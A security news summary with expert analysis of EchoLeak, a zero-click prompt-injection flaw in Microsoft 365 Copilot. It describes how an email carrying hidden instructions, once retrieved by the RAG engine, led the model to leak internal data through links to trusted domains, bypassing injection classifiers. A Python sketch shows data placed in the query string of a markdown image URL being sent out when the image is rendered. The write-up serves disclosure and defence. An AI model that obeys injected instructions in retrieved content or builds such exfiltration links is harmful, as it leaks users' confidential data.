The EchoLeak vulnerability in Microsoft 365 Copilot allowed zero-click data exfiltration; Microsoft has patched the flaw, which highlights broader AI security risks.
Researchers from Aim Labs uncovered EchoLeak, the first known zero-click AI vulnerability in Microsoft 365 Copilot, which allowed attackers to exfiltrate sensitive enterprise data without any user interaction. Assigned CVE-2025-32711 and rated critical by Microsoft, the flaw exploited a class of issues known as LLM Scope Violations. The attack chain begins with a hidden prompt injection embedded in a seemingly benign email; when Copilot's Retrieval-Augmented Generation (RAG) engine later retrieves that email, the injected instructions cause the large language model to leak internal data into crafted outbound links. Exfiltration succeeded because those links pointed at trusted Microsoft domains, such as Teams and SharePoint, that Copilot's defenses did not block. Microsoft patched the issue server-side in May 2025, following its January disclosure, and confirmed there is no evidence of real-world exploitation.
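The exfiltration step described above can be sketched in a few lines. In a hypothetical rendering pipeline (the domain, parameter name, and data below are illustrative, not taken from the actual exploit), a model response containing a markdown image whose URL carries stolen data triggers an outbound request the moment a client renders it, with no click required:

```python
import re
from urllib.parse import urlparse, parse_qs

# Hypothetical model output: a prompt injection has coaxed the assistant
# into appending internal data as a query parameter on an image URL
# hosted on a domain the client is configured to trust.
model_output = (
    "Here is the summary you asked for.\n"
    "![status](https://trusted.contoso.example/pixel.png?d=Q3-revenue-forecast)"
)

# Markdown image syntax is ![alt](url). Rendering clients fetch the URL
# automatically, so the data in the query string reaches the attacker's
# server without any user interaction -- the "zero-click" property.
IMG_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

for url in IMG_RE.findall(model_output):
    parsed = urlparse(url)
    leaked = parse_qs(parsed.query).get("d", [])
    print(f"request to {parsed.netloc} would carry: {leaked}")
```

The point of the sketch is that the renderer, not the user, performs the exfiltrating request; the attacker only needs the model to emit a well-formed image link.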
Analysis by Our Experts:
EchoLeak exposes a critical design flaw in how large language models operate within enterprise AI assistants. The attack exploited indirect prompt injection via retrieved context, without requiring a single click, demonstrating that indirect prompt influence alone is enough to cause data leakage. The fact that standard protective classifiers such as Microsoft's XPIA (cross-prompt injection attack) filters were bypassed using plain natural language indicates that existing detection systems are inadequate against advanced prompt obfuscation. While Microsoft mitigated the flaw before public exploitation, the structural risk remains: if AI systems retrieve unfiltered data across trusted domains, attackers need only craft a plausible message. EchoLeak confirms that prompt-level manipulation is now a viable method of data exfiltration and must be treated with the same severity as traditional software vulnerabilities.
Read the full article here.